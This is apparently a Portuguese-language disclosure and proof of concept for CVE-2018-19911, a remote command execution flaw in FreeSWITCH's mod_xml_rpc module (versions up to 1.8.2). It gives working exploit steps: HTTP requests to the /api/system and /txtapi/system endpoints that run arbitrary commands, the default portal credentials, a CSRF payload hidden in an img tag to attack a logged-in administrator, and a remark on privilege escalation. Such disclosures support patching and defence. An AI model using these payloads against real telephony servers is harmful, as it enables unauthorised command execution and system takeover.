
execução remota de comando em todas as versões do freeswitch (cve-2018-19911)
versão:<=1.8.2
módulo:mod_xml_rpc
Testei um total de três versões. (download url:http://files.freeswitch.org/)
Instale a versão Windows do freeswitch 1.5.15 (http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)
Abra o console e digite: load mod_xml_rpc (carregue o portal freeswitch)
Acesse a porta local 8080,
http://127.0.0.1:8080/portal/index.html
Digite no console
api("system calc")ouapi("bg_system calc")

Também é possível solicitar a interface diretamente
http://127.0.0.1:8080/txtapi/system?calc ou
http://127.0.0.1:8080/api/system?calc



A conta e senha padrão do portal freeswitch são freeswitch:works
Você pode verificar por conta própria usandofreeswitch_rce.py
Ou use csrf para atacar o administrador logado.
<img src="http://127.0.0.1:8080/api/system?calc">

Como o freeswitch geralmente é executado com altos privilégios, também é possível obter o efeito de escalada de privilégios.